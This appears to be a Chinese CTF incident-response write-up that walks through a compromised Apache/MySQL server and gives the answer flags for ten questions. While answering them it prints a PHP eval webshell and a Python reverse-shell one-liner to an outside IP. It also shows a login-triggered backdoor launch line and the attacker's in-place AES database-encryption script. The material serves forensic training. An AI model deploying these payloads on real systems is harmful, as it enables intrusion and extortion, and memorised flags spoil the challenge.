任务环境说明
注:进入环境后先执行 `sed -i 's/Listen 80/Listen 9999/' /etc/apache2/ports.conf && service apache2 restart`(`-i` 与表达式之间要有空格,否则 GNU sed 会把表达式当成备份后缀而报错)。

# 题目 1

攻击者通过什么密码成功登录了网站的后台?提交密码字符串的小写 md5 值,格式 flag {md5}。

根目录下有一个 wireshark.pcap 的流量包

用 Wireshark 打开,先过滤 http 请求,然后追踪 HTTP 流,搜索关键字 &password,找到响应为 302 跳转(即登录成功)的那条请求。

密码: Aa12345^

flag: flag{d63edb0e9df4cf411398e3658c0237e0}

# 题目 2

攻击者在哪个 PHP 页面中成功上传了后门文件?例如 upload.php 页面,上传字符串 "upload.php" 的小写 md5 值,格式 flag {md5}。

root@ubuntu18:~# cat /var/log/apache2/access.log* | grep "upload"
192.168.16.43 - - [18/Nov/2023:23:21:04 +0000] "POST /pluginmgr.php?op=upload HTTP/1.1" 302 39309 "http://192.168.18.24/pluginmgr.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"

名称: pluginmgr.php

flag: flag{b05c0be368ffa72e6cb2df7e1e1b27be}

# 题目 3

找到攻击者上传的 webshell 文件,提交该文件的小写 md5 值,格式 flag {md5}。

HTTP 流中没有直接找到 webshell 的内容。

于是改为在 Web 目录中按常用的一句话木马特征搜索:

root@ubuntu18:~# grep -rw "eval(\$_POST" /var/www/html/
/var/www/html/plugins/cpg.php:<?php @eval($_POST["m3"]);?>
root@ubuntu18:~# md5sum /var/www/html/plugins/cpg.php
a097b773ced57bb7d51c6719fe8fe5f5  /var/www/html/plugins/cpg.php

flag: flag{a097b773ced57bb7d51c6719fe8fe5f5}

# 题目 4

攻击者后续又下载了一个可执行的后门程序,提交该文件的小写 md5 值,格式 flag {md5}。

root@ubuntu18:~# cat /var/log/apache2/error.log* | grep "http://"
--2023-11-18 23:21:43--  http://124.221.70.199:8889/is.world
root@ubuntu18:~# find / -name "is.world" 2>/dev/null
/var/www/html/plugins/.       /is.world
root@ubuntu18:~# md5sum "/var/www/html/plugins/.       /is.world"
ee279c39bf3dcb225093bdbafeb9a439  /var/www/html/plugins/.       /is.world

flag: flag{ee279c39bf3dcb225093bdbafeb9a439}

# 题目 5

攻击者创建了后门用户的名称是?例如 attack 恶意用户,上传字符串 "attack" 的小写 md5 值,格式 flag {md5}。

root@ubuntu18:~# cat /etc/passwd | tail
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
knowledgegraphd:x:0:0::/home/knowledgegraphd:/bin/bash
root@ubuntu18:~# chage -l knowledgegraphd
Last password change                                    : Nov 18, 2023
Password expires                                        : never
Password inactive                                       : never
Account expires                                         : never
Minimum number of days between password change          : 0
Maximum number of days between password change          : 99999
Number of days of warning before password expires       : 7
root@ubuntu18:~# echo -n "knowledgegraphd" | md5sum
4cda3461543c9a770a3349760594facd  -

flag: flag{4cda3461543c9a770a3349760594facd}

# 题目 6

攻击者创建了一个持久化的配置项,导致任意用户登录就会触发后门的连接。提交该配置项对应配置文件的小写 md5 值,格式 flag {md5}。

root@ubuntu18:~# cat /etc/profile
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).
if [ "${PS1-}" ]; then
  if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then
    # The file bash.bashrc already sets the default PS1.
    # PS1='\h:\w\$ '
    if [ -f /etc/bash.bashrc ]; then
      . /etc/bash.bashrc
    fi
  else
    if [ "`id -u`" -eq 0 ]; then
      PS1='# '
    else
      PS1='$ '
    fi
  fi
fi
/var/www/html/plugins/".       "/is.world &
if [ -d /etc/profile.d ]; then
  for i in /etc/profile.d/*.sh; do
    if [ -r $i ]; then
      . $i
    fi
  done
  unset i
fi
root@ubuntu18:~# md5sum /etc/profile
65bf3e4a9ac90d75ec28be0317775618  /etc/profile

flag: flag{65bf3e4a9ac90d75ec28be0317775618}

# 题目 7

攻击者创建了一个持久化的配置项,导致只有 root 用户登录才会触发后门的连接。提交该配置项对应配置文件的小写 md5 值,格式 flag {md5}。

检查了一下 root 用户目录下的 .profile 和 .bashrc。

.bashrc 中发现一条恶意的反弹 shell 命令(后台启动,连接到攻击者主机):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("124.221.70.199",9919));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &
root@ubuntu18:~# md5sum .bashrc 
4acc9c465eeeb139c194893ec0a8bcbc  .bashrc

flag: flag{4acc9c465eeeb139c194893ec0a8bcbc}

# 题目 8

攻击者加密了哪个数据库?提交数据库的文件夹名,例如 user 数据库对应存放位置为 user 文件夹,上传字符串 "user" 的小写 md5 值,格式 flag {md5}。

检查 /var/lib/mysql 目录下的文件,发现一个不属于 MySQL 的 PHP 脚本:它用 AES-256-CBC 原地加密 JPMorgan@0020Chase 目录下的全部文件,密钥为脚本运行当天日期的 md5,IV 由固定字符串派生:

root@ubuntu18:~# find /var/lib/mysql/ -name "*.php" -o -name "*.py" -o -name "*.sh"
/var/lib/mysql/clockup.php
<?php
$currentDate = date("Y-m-d");
$key = md5($currentDate);
$iv = substr(hash('sha256', "DeepMountainsGD"), 0, 16);
$filePath = "/var/lib/mysql/JPMorgan@0020Chase";
$files = scandir($filePath);
foreach ($files as $file) {
    if ($file != "." && $file != "..") {
        $fullPath = $filePath . '/' . $file;
        $content = file_get_contents($fullPath);
        $encryptedContent = openssl_encrypt($content, 'aes-256-cbc', $key, 0, $iv);
        file_put_contents($fullPath, $encryptedContent);
    }
}
?>
root@ubuntu18:~# echo -n "JPMorgan@0020Chase" | md5sum
0928a5424aa6126e5923980ca103560e  -

flag: flag{0928a5424aa6126e5923980ca103560e}

# 题目 9

解密数据库,提交 Harper 用户对应 Areer 的值。提交 Areer 值的小写 md5 值,格式 flag {md5}。

根据 clockup.php 的加密逻辑编写解密脚本。密钥是加密当天日期的 md5,而不是今天的日期;从访问日志和后门用户的密码修改日期可知入侵发生在 2023-11-18,因此密钥取 md5('2023-11-18'):

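<?php
// Decrypts the database files that clockup.php encrypted in place.
//
// The parameters mirror the ransomware script: AES-256-CBC, key = md5 of the
// date the encryption ran (2023-11-18, the day of the intrusion), IV = the
// first 16 bytes of sha256("DeepMountainsGD"). openssl_encrypt() was called
// with options = 0, so the files hold base64 ciphertext.
//
// Usage: php decrypt.php [YYYY-MM-DD]   (defaults to 2023-11-18)
//
// Exits 0 when every file decrypted, 1 when the directory is unreadable or
// any file failed to decrypt (those files are left untouched).
$encryptionDate = isset($argv[1]) ? $argv[1] : '2023-11-18';
$key = md5($encryptionDate);
$iv = substr(hash('sha256', "DeepMountainsGD"), 0, 16);
// "@0020" is how MySQL encodes the space of the `JPMorgan Chase` database
// name in its data directory.
$filePath = "/var/lib/mysql/JPMorgan@0020Chase";
$files = scandir($filePath);
if ($files === false) {
    fwrite(STDERR, "cannot read directory $filePath\n");
    exit(1);
}
$failed = 0;
foreach ($files as $file) {
    $fullPath = $filePath . '/' . $file;
    // scandir() also returns "." and ".."; skip those and anything that is
    // not a regular file (file_get_contents() on a directory fails).
    if ($file == "." || $file == ".." || !is_file($fullPath)) {
        continue;
    }
    $encryptedContent = file_get_contents($fullPath);
    $decryptedContent = openssl_decrypt($encryptedContent, 'aes-256-cbc', $key, 0, $iv);
    // openssl_decrypt() returns false on a wrong key/IV or on input that is
    // not its ciphertext. Writing that result back would replace the only
    // copy of the ciphertext with an empty file, so keep the file as is.
    if ($decryptedContent === false) {
        fwrite(STDERR, "decrypt failed, file left untouched: $fullPath\n");
        $failed++;
        continue;
    }
    file_put_contents($fullPath, $decryptedContent);
}
exit($failed === 0 ? 0 : 1);
?>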
root@ubuntu18:/var/lib/mysql# php decrypt.php
root@ubuntu18:/var/lib/mysql# mysql -h 127.0.0.1 -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.42-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| JPMorgan Chase     |
| mirage             |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
6 rows in set (0.00 sec)
mysql> USE `JPMorgan Chase`;
Database changed
mysql> show tables;
+--------------------------+
| Tables_in_JPMorgan Chase |
+--------------------------+
| Balance                  |
| UserIdentity             |
+--------------------------+
2 rows in set (0.00 sec)
mysql> SELECT * FROM UserIdentity WHERE User = 'Harper';
+------+--------+-------+
| No   | User   | Areer |
+------+--------+-------+
| 14   | Harper | Chef  |
+------+--------+-------+
1 row in set (0.01 sec)
mysql> exit
Bye
root@ubuntu18:/var/lib/mysql# echo -n "Chef" | md5sum
8fd82b8864d71ed7fa12b59e6e34cd1c  -

flag: flag{8fd82b8864d71ed7fa12b59e6e34cd1c}

# 题目 10

因为什么文件中的漏洞配置,导致了攻击者成功执行命令并提权。提交该文件的小写 md5 值,格式 flag {md5}。

root@ubuntu18:~# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root    ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /bin/systemctl status apache2.service
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
root@ubuntu18:~# md5sum /etc/sudoers
6585817513b0ea96707ebb0d04d6aeff  /etc/sudoers

flag: flag{6585817513b0ea96707ebb0d04d6aeff}